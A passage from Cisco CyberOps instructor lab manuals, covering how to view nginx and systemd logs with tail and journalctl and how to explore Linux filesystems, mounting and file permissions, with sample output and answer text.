"Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"

127.0.0.1 - - [22/Mar/2017:12:49:26 -0400] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0

(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/Mar/2017:12:49:50 -0400] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/Mar/2017:12:49:53 -0400] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/Mar/2017:13:01:55 -0400] "GET /favicon.ico HTTP/1.1" 404 169 "-"
"Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
As before, tail displays the last 10 lines of the file. However, notice that tail does not exit after displaying
the lines; the command prompt is not visible, indicating that tail is still running.
Note: Your /var/log/access.log file may be empty due to log rotation. Continue following the lab as an
empty /var/log/access.log file will not impact the lab.
d. With tail still running on the terminal window, click the web browser icon on the Dock to open a web
browser window. Re-size the web browser window in a way that it allows you to see the bottom of the
terminal window where tail is still running.
Note: In the screenshot below, the Enter key was pressed a few times in the terminal window running tail.
This is for visualization only as tail does not process any input while running with –f. The extra empty
lines make it easier to detect new entries, as they are displayed at the bottom of the terminal window.

e. In the web browser address bar, enter 127.0.0.1 and press Enter. This is the address of the VM itself,
which tells the browser to connect to a web server running on the local computer. A new entry should be
recorded in the /var/log/nginx/access.log file. Refresh the webpage to see new entries added to the log.
127.0.0.1 - - [23/Mar/2017:09:48:36 -0400] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
Because tail is still running, it should display the new entry at the bottom of the terminal window. Aside
from the timestamp, your entry should look like the one above.
Note: Firefox stores pages in cache for future use. If a page is already in cache, force Firefox to ignore
the cache and place web requests, reload the page by pressing <CTRL+SHIFT+R>.
f. Because the log file is being updated by nginx, we can state with certainty that /var/log/acess.log is in fact
the log file in use by nginx.
g. Enter Ctrl + C to end the tail monitoring session.

Step 2: BONUS TOOL: Journalctl

The CyberOps Workstation VM is based on Arch Linux. Categorized as a Linux distribution, Arch Linux is
designed to be lightweight, minimalist and simple. As part of this design philosophy, Arch Linux uses systemd
as its init system. In Linux, the init process is the first process loaded when the computer boots. Init is directly
or indirectly, the parent of all processes running on the system. It is started by the kernel at boot time and
continues to run until the computer shuts down. Typically, init has the process ID 1.
An init system is a set of rules and conventions governing the way the user space in a given Linux system is
created and made available to the user. Init systems also specify system-wide parameters such as global
configuration files, logging structure and service management.
Systemd is a modern init system designed to unify Linux configuration and service behavior across all Linux
distributions and has been increasingly adopted by major Linux distributions. Arch Linux relies on systemd for
init functionality. The CyberOps Workstation VM also uses systemd.
system-journald (or simpy journald) is systemd’s event logging service and uses append-only binary files
serving as its log files. Notice that journald does not impede the use of other logging systems such as syslog
and rsyslog.
This section provides a brief overview of journalctl, a journald utility used for log viewing and real-time
monitoring.
a. In a terminal window in the CyberOps Workstation VM, issue the journalctl command with no options to
display all journal log entries (it can be quite long):
[analyst@secOps ~]$ journalctl
Hint: You are currently not seeing messages from other users and the system.
Users in groups 'adm', 'systemd-journal', 'wheel' can see all messages.
Pass -q to turn off this notice.
-- Logs begin at Fri 2014-09-26 14:13:12 EDT, end at Fri 2017-03-31 09:54:58 EDT
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Starting Paths.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Reached target Paths.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Starting Timers.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Reached target Timers.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Starting Sockets.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Reached target Sockets.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Starting Basic System.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Reached target Basic System.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Starting Default.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Reached target Default.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Startup finished in 18ms.
Sep 26 14:14:24 dataAnalyzer systemd[1087]: Stopping Default.
<some output omitted>
The output begins with a line similar to the one below, marking the timestamp where the system started
logging. Notice that the timestamps will vary from system to system.
-- Logs begin at Fri 2014-09-26 13:22:51 EDT, end at Fri 2017-03-31 10:12:19
EDT. –-
journalctl includes a number of functionalities such as page scrolling, color-coded messages and more.
Use the keyboard up/down arrow keys to scroll up/down the output, one line at a time. Use the left/right
keyboard arrow keys to scroll sideways and display log entries that span beyond the boundaries of the
terminal window. The <ENTER> key displays the next line while the space bar displays the next page in
the output. Press the q key to exit journalctl.

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 10 of 16
Lab – Locating Log Files

Notice the hint message provided by journalctl:

Hint: You are currently not seeing messages from other users and the system.
Users in groups 'adm', 'systemd-journal', 'wheel' can see all messages.
Pass -q to turn off this notice.
This message reminds you that, because analyst is a regular user and not a member of either the adm,
systemd-journal or wheel groups, not all log entries will be displayed by journalctl. It also states that
running journalctl with the –q option suppresses the hint message.
How can you run journalctl and see all log entries?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Running journalctl as the root user will display all entries. To run journalctl as root, prepend the sudo
command to journalctl: sudo journalctl.
b. journalctl includes options to help in filtering the output. Use the –b option to display boot-related log
entries:
[analyst@secOps ~]$ sudo journalctl -b
-- Logs begin at Fri 2014-09-26 13:22:51 EDT, end at Fri 2017-03-31 10:18:04 EDT. --
Mar 31 05:54:43 secOps systemd-journald[169]: Time spent on flushing to /var is 849us
for 0 entries.
Mar 31 05:54:43 secOps kernel: Linux version 4.8.12-2-ARCH (builduser@andyrtr) (gcc
version 6.2.1 20160830 (GCC) ) #1 SMP PREEM
Mar 31 05:54:43 secOps kernel: x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating
point registers'
Mar 31 05:54:43 secOps kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE
registers'
Mar 31 05:54:43 secOps kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX
registers'
Mar 31 05:54:43 secOps kernel: x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256
Mar 31 05:54:43 secOps kernel: x86/fpu: Enabled xstate features 0x7, context size is
832 bytes, using 'standard' format.
Mar 31 05:54:43 secOps kernel: x86/fpu: Using 'eager' FPU context switches.
Mar 31 05:54:43 secOps kernel: e820: BIOS-provided physical RAM map:
Mar 31 05:54:43 secOps kernel: BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff]
usable
Mar 31 05:54:43 secOps kernel: BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff]
reserved
Mar 31 05:54:43 secOps kernel: BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff]
reserved
Mar 31 05:54:43 secOps kernel: BIOS-e820: [mem 0x0000000000100000-0x000000007ffeffff]
usable
<some output omitted>
c. To see entries related to the last boot, add the -1 to the command above. To see entries related to the
two last boots, add the -2 option.
[analyst@secOps ~]$ sudo journalctl –b -2
-- Logs begin at Fri 2014-09-26 13:22:51 EDT, end at Fri 2017-03-31 10:21:03 EDT. --
Mar 22 09:35:11 secOps systemd-journald[181]: Time spent on flushing to /var is
4.204ms for 0 entries.
Mar 22 09:35:11 secOps kernel: Linux version 4.8.12-2-ARCH (builduser@andyrtr) (gcc
version 6.2.1 20160830 (GCC) ) #1 SMP PREEM

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 11 of 16
Lab – Locating Log Files

Mar 22 09:35:11 secOps kernel: x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating
point registers'
Mar 22 09:35:11 secOps kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE
registers'
Mar 22 09:35:11 secOps kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX
registers'
Mar 22 09:35:11 secOps kernel: x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256
Mar 22 09:35:11 secOps kernel: x86/fpu: Enabled xstate features 0x7, context size is
832 bytes, using 'standard' format.
Mar 22 09:35:11 secOps kernel: x86/fpu: Using 'eager' FPU context switches.
Mar 22 09:35:11 secOps kernel: e820: BIOS-provided physical RAM map:
Mar 22 09:35:11 secOps kernel: BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff]
usable
Mar 22 09:35:11 secOps kernel: BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff]
reserved
Mar 22 09:35:11 secOps kernel: BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff]
reserved
Mar 22 09:35:11 secOps kernel: BIOS-e820: [mem 0x0000000000100000-0x000000007ffeffff]
usable
Mar 22 09:35:11 secOps kernel: BIOS-e820: [mem 0x000000007fff0000-0x000000007fffffff]
ACPI data
Mar 22 09:35:11 secOps kernel: BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff]
reserved
Mar 22 09:35:11 secOps kernel: BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff]
reserved
<some output omitted>
d. Use the --list-boots option to list previous boots:
[analyst@secOps ~]$ sudo journalctl –-list-boots
-144 fbef03a1b59c40429f3e083613ab775a Fri 2014-09-26 13:22:51 EDT—Fri 2014-09-26
14:05:00 EDT
-143 69ebae646d6b41f0b3de9401cb3aa591 Fri 2014-09-26 14:05:07 EDT—Fri 2014-09-26
20:35:29 EDT
-142 73a305f65dea41e787b164411dfc6750 Fri 2014-09-26 20:35:34 EDT—Fri 2014-09-26
20:52:22 EDT
-141 48a113d5d2f44979a849c9c0d9ecdfa2 Fri 2014-09-26 20:52:33 EDT—Fri 2014-09-26
21:08:35 EDT
-140 002af74c3fc44008a882384f546c438d Fri 2014-09-26 21:08:45 EDT—Fri 2014-09-26
21:16:39 EDT
-139 f3ca1d06495c4e26b367e6867f03374c Fri 2014-09-26 21:16:47 EDT—Fri 2014-09-26
21:50:19 EDT
-138 bd232f288e544a79aa3bc444e02185a8 Fri 2014-09-26 21:50:28 EDT—Fri 2014-09-26
22:33:13 EDT
-137 2097c11f249c431aa8ad8da31a5b26d1 Fri 2014-09-26 22:40:39 EDT—Fri 2014-09-26
23:55:46 EDT
-136 b24d5e718a724b18b352e9b2daed3db6 Sat 2014-09-27 10:57:32 EDT—Sat 2014-09-27
14:26:43 EDT
-135 5a189fc68352484a8b40cd719ff7dd41 Sat 2014-09-27 19:44:23 EDT—Sat 2014-09-27
22:50:24 EDT
-134 d0be08c1f26642a1a20bb70bfc7b722c Mon 2014-09-29 09:17:14 EDT—Mon 2014-09-29
12:12:10 EDT
-133 b00b0d4c07464071b0d3cac4eb79dda3 Mon 2014-09-29 12:39:12 EDT—Mon 2014-09-29
13:24:38 EDT
<some output omitted>

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 12 of 16
Lab – Locating Log Files

e. Use the --since “<time range>” to specify the time range of which log entries should be displayed. The
two commands below display all log entries generated in the last two hours and in the last day,
respectively:
[analyst@secOps ~]$ sudo journalctl –-since "2 hours ago"
-- Logs begin at Fri 2014-09-26 13:22:51 EDT, end at Fri 2017-03-31 10:28:29 EDT. --
Mar 31 09:54:45 secOps kernel: 00:00:00.008577 main 5.1.10 r112026 started.
Verbose level = 0
Mar 31 09:54:45 secOps systemd[1]: Time has been changed
Mar 31 09:54:45 secOps systemd[1]: Started Rotate log files.
Mar 31 09:54:45 secOps ovsdb-server[263]: 2017-03-
31T13:54:45Z|00001|ovsdb_server|INFO|ovsdb-server (Open vSwitch) 2.6.1
Mar 31 09:54:45 secOps ovsdb-server[263]: ovs|00001|ovsdb_server|INFO|ovsdb-server
(Open vSwitch) 2.6.1
Mar 31 09:54:45 secOps kernel: openvswitch: Open vSwitch switching datapath
Mar 31 09:54:45 secOps systemd[1]: Started Open vSwitch Daemon.
Mar 31 09:54:45 secOps dhcpcd[279]: enp0s3: soliciting an IPv6 router
Mar 31 09:54:45 secOps ovs-vswitchd[319]: 2017-03-
31T13:54:45Z|00001|ovs_numa|INFO|Discovered 1 CPU cores on NUMA node 0
Mar 31 09:54:45 secOps ovs-vswitchd[319]: 2017-03-
31T13:54:45Z|00002|ovs_numa|INFO|Discovered 1 NUMA nodes and 1 CPU cores
Mar 31 09:54:45 secOps ovs-vswitchd[319]: ovs|00001|ovs_numa|INFO|Discovered 1 CPU
cores on NUMA node 0
Mar 31 09:54:45 secOps ovs-vswitchd[319]: ovs|00002|ovs_numa|INFO|Discovered 1 NUMA
nodes and 1 CPU cores
Mar 31 09:54:45 secOps ovs-vswitchd[319]: 2017-03-
31T13:54:45Z|00003|reconnect|INFO|unix:/run/openvswitch/db.sock: connecting..
Mar 31 09:54:45 secOps ovs-vswitchd[319]: 2017-03-
31T13:54:45Z|00004|reconnect|INFO|unix:/run/openvswitch/db.sock: connected
Mar 31 09:54:45 secOps ovs-vswitchd[319]:
ovs|00003|reconnect|INFO|unix:/run/openvswitch/db.sock: connecting...
Mar 31 09:54:45 secOps ovs-vswitchd[319]:
ovs|00004|reconnect|INFO|unix:/run/openvswitch/db.sock: connected
Mar 31 09:54:45 secOps ovs-vswitchd[319]: 2017-03-
31T13:54:45Z|00005|ovsdb_idl|WARN|Interface table in Open_vSwitch database la
Mar 31 09:54:45 secOps ovs-vswitchd[319]: 2017-03-
31T13:54:45Z|00006|ovsdb_idl|WARN|Mirror table in Open_vSwitch database lacks
<some output omitted>

[analyst@secOps ~]$ sudo journalctl –-since "1 day ago"

-- Logs begin at Fri 2014-09-26 13:22:51 EDT, end at Fri 2017-03-31 10:26:48 EDT. --
Mar 30 05:54:43 secOps systemd-journald[169]: Time spent on flushing to /var is 849us
for 0 entries.
Mar 30 05:54:43 secOps kernel: Linux version 4.8.12-2-ARCH (builduser@andyrtr) (gcc
version 6.2.1 20160830 (GCC) ) #1 SMP PREEM
Mar 30 05:54:43 secOps kernel: x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating
point registers'
Mar 30 05:54:43 secOps kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE
registers'
Mar 30 05:54:43 secOps kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX
registers'
Mar 30 05:54:43 secOps kernel: x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256
Mar 31 05:54:43 secOps kernel: x86/fpu: Enabled xstate features 0x7, context size is
832 bytes, using 'standard' format.

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 13 of 16
Lab – Locating Log Files

Mar 30 05:54:43 secOps kernel: x86/fpu: Using 'eager' FPU context switches.
Mar 30 05:54:43 secOps kernel: e820: BIOS-provided physical RAM map:
Mar 30 05:54:43 secOps kernel: BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff]
usable
Mar 30 05:54:43 secOps kernel: BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff]
reserved
Mar 30 05:54:43 secOps kernel: BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff]
reserved
<some output omitted>

f. journalctl also allows for displaying log entries related to a specific service with the –u option. The
command below displays logs entries related to nginx:
[analyst@secOps ~]$ sudo journalctl –u nginx.service
-- Logs begin at Fri 2014-09-26 13:22:51 EDT, end at Fri 2017-03-31 10:30:39 EDT. --
Oct 19 16:47:57 secOps systemd[1]: Starting A high performance web server and a
reverse proxy server...
Oct 19 16:47:57 secOps nginx[21058]: 2016/10/19 16:47:57 [warn] 21058#21058:
conflicting server name "localhost" on 0.0.0.0:80,
Oct 19 16:47:57 secOps systemd[1]: nginx.service: PID file /run/nginx.pid not readable
(yet?) after start: No such file or dire
Oct 19 16:47:57 secOps systemd[1]: Started A high performance web server and a reverse
proxy server.
Oct 19 17:40:09 secOps nginx[21058]: 2016/10/19 17:40:09 [error] 21060#21060: *1
open() "/usr/share/nginx/html/favicon.ico" fai
Oct 19 17:40:09 secOps nginx[21058]: 2016/10/19 17:40:09 [error] 21060#21060: *1
open() "/usr/share/nginx/html/favicon.ico" fai
Oct 19 17:41:21 secOps nginx[21058]: 2016/10/19 17:41:21 [error] 21060#21060: *2
open() "/usr/share/nginx/html/favicon.ico" fai
Oct 19 17:41:21 secOps nginx[21058]: 2016/10/19 17:41:21 [error] 21060#21060: *2
open() "/usr/share/nginx/html/favicon.ico" fai
Oct 19 18:36:33 secOps systemd[1]: Stopping A high performance web server and a
reverse proxy server...
Oct 19 18:36:33 secOps systemd[1]: Stopped A high performance web server and a reverse
proxy server.
-- Reboot --
Oct 19 18:36:49 secOps systemd[1]: Starting A high performance web server and a
reverse proxy server...
Oct 19 18:36:49 secOps nginx[399]: 2016/10/19 18:36:49 [warn] 399#399: conflicting
server name "localhost" on 0.0.0.0:80, ignor
Oct 19 18:36:49 secOps systemd[1]: nginx.service: PID file /run/nginx.pid not readable
(yet?) after start: No such file or dire
Oct 19 18:36:49 secOps systemd[1]: Started A high performance web server and a reverse
proxy server.
<some output omitted>
Note: As part of systemd, services are described as units. Most service installation packages create units
and enable units during the installation process.
g. Similar to tail –f, journalctl also supports real-time monitoring. Use the –f option to instruct journalctl to
follow a specific log. Press Ctrl + C to exit.
[analyst@secOps ~]$ sudo journalctl -f
[sudo] password for analyst:
-- Logs begin at Fri 2014-09-26 13:22:51 EDT. --
Mar 31 10:34:15 secOps filebeat[222]: 2017/03/31 14:34:15.077058 logp.go:232: INFO No
non-zero metrics in the last 30s

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 14 of 16
Lab – Locating Log Files

Mar 31 10:34:40 secOps sudo[821]: pam_unix(sudo:session): session closed for user root
Mar 31 10:34:45 secOps filebeat[222]: 2017/03/31 14:34:45.076057 logp.go:232: INFO No
non-zero metrics in the last 30s
Mar 31 10:35:15 secOps filebeat[222]: 2017/03/31 14:35:15.076118 logp.go:232: INFO No
non-zero metrics in the last 30s
Mar 31 10:35:45 secOps filebeat[222]: 2017/03/31 14:35:45.076924 logp.go:232: INFO No
non-zero metrics in the last 30s
Mar 31 10:36:15 secOps filebeat[222]: 2017/03/31 14:36:15.076060 logp.go:232: INFO No
non-zero metrics in the last 30s
Mar 31 10:36:45 secOps filebeat[222]: 2017/03/31 14:36:45.076122 logp.go:232: INFO No
non-zero metrics in the last 30s
Mar 31 10:37:15 secOps filebeat[222]: 2017/03/31 14:37:15.076801 logp.go:232: INFO No
non-zero metrics in the last 30s
Mar 31 10:37:30 secOps sudo[842]: analyst : TTY=pts/0 ; PWD=/home/analyst ; USER=root
; COMMAND=/usr/bin/journalctl -f
Mar 31 10:37:31 secOps sudo[842]: pam_unix(sudo:session): session opened for user root
by (uid=0)
<some output omitted>
h. journalctl also supports mixing options to achieve the desired filter set. The command below monitors
nginx system events in real time.
[analyst@secOps ~]$ sudo journalctl -u nginx.service -f
-- Logs begin at Fri 2014-09-26 13:22:51 EDT. --
Mar 23 10:08:41 secOps systemd[1]: Stopping A high performance web server and a
reverse proxy server...
Mar 23 10:08:41 secOps systemd[1]: Stopped A high performance web server and a reverse
proxy server.
-- Reboot --
Mar 29 11:28:06 secOps systemd[1]: Starting A high performance web server and a
reverse proxy server...
Mar 29 11:28:06 secOps systemd[1]: nginx.service: PID file /run/nginx.pid not readable
(yet?) after start: No such file or directory
Mar 29 11:28:06 secOps systemd[1]: Started A high performance web server and a reverse
proxy server.
Mar 29 11:31:45 secOps systemd[1]: Stopping A high performance web server and a
reverse proxy server...
Mar 29 11:31:45 secOps systemd[1]: Stopped A high performance web server and a reverse
proxy server.
-- Reboot --
Mar 31 09:54:51 secOps systemd[1]: Starting A high performance web server and a
reverse proxy server...
Mar 31 09:54:51 secOps systemd[1]: nginx.service: PID file /run/nginx.pid not readable
(yet?) after start: No such file or directory
Mar 31 09:54:51 secOps systemd[1]: Started A high performance web server and a reverse
proxy server.

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 15 of 16
Lab – Locating Log Files

i. Keep the command above running, open a new web browser window and type 127.0.0.1 (default
configuration) or 127.0.0.1:8080 (custom_server.conf) in the address bar. journalctl should display an
error related to a missing favicon.ico file in real-time:

Reflection
Log files are extremely important for troubleshooting.
Log file location follows convention but ultimately, it is a choice of the developer.
More often than not, log file information (location, file names, etc.) is included in the documentation. If the
documentation does not provide useful information on log files, a combination of web research, and system
investigation should be used.
Clocks should always be synchronized to ensure all systems have the correct time. If clocks are not correctly
set, it is very difficult to trace back events.
It is important to understand when specific events took place. In addition to that, events from different sources
are often analyzed at the same time.

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 16 of 16
Lab - Navigating the Linux Filesystem and Permission Settings
(Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
In this lab, you will use familiarize yourself with Linux filesystems.

Required Resources
 CyberOps Workstation VM

Part 1: Exploring Filesystems in Linux

The Linux filesystem is one of its most popular features. While Linux supports many different types of
filesystems, this lab focuses on the ext family, one the most common filesystems found on Linux.

Step 1: Access the command line.

Launch the CyberOps Workstation VM and open a terminal window.

Step 2: Display the filesystems currently mounted.

Filesystems must be mounted before they can be accessed and used. In computing, mounting a filesystem
means to make it accessible to the operating system. Mounting a filesystem is the process of linking the
physical partition on the block device (hard drive, SSD drive, pen drive, etc.) to a directory, through which the
entire filesystem can be accessed. Because the aforementioned directory becomes the root of the newly
mounted filesystem, it is also known as mounting point.
a. Use the lsblk command to display all block devices:
[analyst@secOps ~]$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 5.9G 0 disk
└─sda1 8:1 0 5.9G 0 part /
sdb 8:16 0 1G 0 disk
└─sdb1 8:17 0 1023M 0 part
sr0 11:0 1 1024M 0 rom
The output above shows that the CyberOps Workstation VM has three block devices installed: sr0, sda
and sdb. The tree-like output also shows partitions under sda and sdb. Conventionally, /dev/sdX is used
by Linux to represent hard drives, with the trailing number representing the partition number inside that
device. Computers with multiple hard drives would likely display more /dev/sdX devices. If Linux was
running on a computer with four hard drives for example, it would show them as /dev/sda, /dev/sdb,
/dev/sdc and /dev/sdd, by default. The output implies that sda and sdb are hard drives, each one
containing a single partition. The output also shows that sda is a 5.9GB disk while sdb has 1GB.
Note: Linux often displays USB flash drives as /dev/sdX as well, depending on their firmware type.
b. Use the mount command to display more detailed information on the currently mounted filesystems in the
CyberOps Workstation VM.
[analyst@secOps ~]$ mount

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 10 www.netacad.com
Lab - Navigating the Linux Filesystem and Permission Settings

proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)

sys on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
dev on /dev type devtmpfs (rw,nosuid,relatime,size=1030408k,nr_inodes=218258,mode=755)
run on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755)
/dev/sda1 on / type ext4 (rw,relatime,data=ordered)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
<output omitted>
Many of the filesystems above are out of scope of this course and irrelevant to the lab. Let’s focus on the
root filesystem, the filesystem stored in /dev/sda1. The root filesystem is where the Linux operating
system itself is stored; all the programs, tools, configuration files are stored in root filesystem by default.
c. Run the mount command again, but this time, use the pipe | to send the output of mount to grep to filter
the output and display only the root filesystem:
[analyst@secOps ~]$ mount | grep sda1
/dev/sda1 on / type ext4 (rw,relatime,data=ordered)
In the filtered output above, mount shows us that the root filesystem is located in the first partition of the
sda block device (/dev/sda1). We know this is the root filesystem because of the mounting point used: “/”
(the slash symbol). The output also tells us the type of formatting used in the partition, ext4 in this case.
The information in between parentheses relates to the partition mounting options.
d. Issue the following two commands below on the CyberOps Workstation VM:
[analyst@secOps ~]$ cd /
[analyst@secOps /]$ ls -l
What is the meaning of the output? Where are the listed files physically stored?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The first command changes the directory to the root directory. The root directory is the highest level of the
filesystems. Because /dev/sda1 is mounted on the root directory (“/”), by listing the files in the root
directory, the user is actually listing files physically stored in the root of the /dev/sda1 filesystem.
Why is /dev/sdb1 not shown in the output above?
____________________________________________________________________________________
____________________________________________________________________________________
Because /dev/sdb1 is not currently mounted.

Step 3: Manually mounting and unmounting filesystems

The mount command can also be used to mount and unmount filesystems. As seen in Step 1, the CyberOps
Workstation VM has two hard drives installed. The first one was recognized by the kernel as /dev/sda while
the second was recognized as /dev/sdb. Before a block device can be mounted, it must have a mounting
point.
a. Use the ls -l command to verify that the directory second_drive is in the analyst's home directory.
[analyst@secOps /]$ cd ~

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 10 www.netacad.com
Lab - Navigating the Linux Filesystem and Permission Settings

[analyst@secOps ~]$ ls –l
total 28
drwxr-xr-x 3 analyst analyst 4096 Aug 16 15:15 cyops_folder2
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
drwxr-xr-x 2 analyst analyst 4096 Mar 3 15:56 second_drive
-rw-r--r-- 1 analyst analyst 142 Aug 16 15:11 some_text_file.txt
-rw-r--r-- 1 analyst analyst 254 Aug 16 13:38 space.txt
Note: If the directory second_drive does not exist, use the mkdir second_drive command to create it.
[analyst@secOps ~]$ mkdir second_drive
Note: Depending on the state of your VM, your listing will most likely have different files and directories.
b. Use ls -l again to list the contents of the newly created second_drive directory.
[analyst@secOps ~]$ ls -l second_drive/
total 0
Notice that the directory is empty.
c. Use the mount command to mount /dev/sdb1 on the newly created second_drive directory. The syntax
of mount is: mount [options] <device to be mounted> <mounting point>.
[analyst@secOps ~]$ sudo mount /dev/sdb1 ~/second_drive/
[sudo] password for analyst:
No output is provided which means the mounting process was successful.
d. Now that the /dev/sdb1 has been mounted on /home/analyst/second_drive, use ls -l to list the contents
of the directory again.
[analyst@secOps ~]$ ls -l second_drive/
total 20
drwx------ 2 root root 16384 Mar 3 10:59 lost+found
-rw-r--r-- 1 root root 183 Mar 3 15:42 myFile.txt
Why is the directory no longer empty? Where are the listed files physically stored?
____________________________________________________________________________________
____________________________________________________________________________________
After the mount, /home/analyst/second_drive becomes the entry point to the filesystem physically
stored in /dev/sdb1.
e. Issue the mount command with no options again to display detailed information about the /dev/sdb1
partition. As before, use the grep command to display only the /dev/sdX filesystems:
[analyst@secOps ~]$ mount | grep sd
/dev/sda1 on / type ext4 (rw,relatime,data=ordered)
cgroup2 on /sys/fs/cgroup/unified type cgroup2
(rw,nosuid,nodev,noexec,relatime,nsdelegate)
/dev/sdb1 on /home/analyst/second_drive type ext4 (rw,relatime,data=ordered)
f. Unmounting filesystems is just as simple. Make sure you change the directory to something outside of the
mounting point and use the umount command as shown below:
[analyst@secOps ~]$ sudo umount /dev/sdb1
[sudo] password for analyst:

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 10 www.netacad.com
Lab - Navigating the Linux Filesystem and Permission Settings

[analyst@secOps ~]$
[analyst@secOps ~]$ ls -l second_drive/
total 0

Part 2: File Permissions

Linux filesystems have built-in features to control the ability of the users to view, change, navigate, and
execute the contents of the filesystem. Essentially, each file in filesystems carries its own set of permissions,
always carrying a set of definitions about what users and groups can do with the file.

Step 1: Visualize and Change the File Permissions.

a. Navigate to /home/analyst/lab.support.files/scripts/.
[analyst@secOps ~]$ cd lab.support.files/scripts/
b. Use the ls -l command to display file permissions.
[analyst@secOps scripts]$ ls -l
total 60
-rwxr-xr-x 1 analyst analyst 190 Jun 13 09:45 configure_as_dhcp.sh
-rwxr-xr-x 1 analyst analyst 192 Jun 13 09:45 configure_as_static.sh
-rwxr-xr-x 1 analyst analyst 3459 Jul 18 10:09 cyberops_extended_topo_no_fw.py
-rwxr-xr-x 1 analyst analyst 4062 Jul 18 10:09 cyberops_extended_topo.py
-rwxr-xr-x 1 analyst analyst 3669 Jul 18 10:10 cyberops_topo.py
-rw-r--r-- 1 analyst analyst 2871 Apr 28 11:27 cyops.mn
-rwxr-xr-x 1 analyst analyst 458 May 1 13:50 fw_rules
-rwxr-xr-x 1 analyst analyst 70 Apr 28 11:27 mal_server_start.sh
drwxr-xr-x 2 analyst analyst 4096 Jun 13 09:55 net_configuration_files
-rwxr-xr-x 1 analyst analyst 65 Apr 28 11:27 reg_server_start.sh
-rwxr-xr-x 1 analyst analyst 189 Dec 15 2016 start_ELK.sh
-rwxr-xr-x 1 analyst analyst 85 Dec 22 2016 start_miniedit.sh
-rwxr-xr-x 1 analyst analyst 76 Jun 22 11:38 start_pox.sh
-rwxr-xr-x 1 analyst analyst 106 Jun 27 09:47 start_snort.sh
-rwxr-xr-x 1 analyst analyst 61 May 4 11:45 start_tftpd.sh
Consider the cyops.mn file as an example. Who is the owner of the file? How about the group?
____________________________________________________________________________________
____________________________________________________________________________________
Owner: analyst; Group: analyst
The permission for cyops.mn are –rw-r--r--. What does that mean?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The owner of the file (the analyst user) can read and write to the file but not execute it (-rw). Members of
the analyst group other than the owner can only read the file (-r-), no execution or writing is allowed. All
other users are not allowed to write or execute that file.
c. The touch command is very simple and useful. It allows for the quick creation of an empty text file. Use
the command below to create an empty file in the /mnt directory:
[analyst@secOps scripts]$ touch /mnt/myNewFile.txt

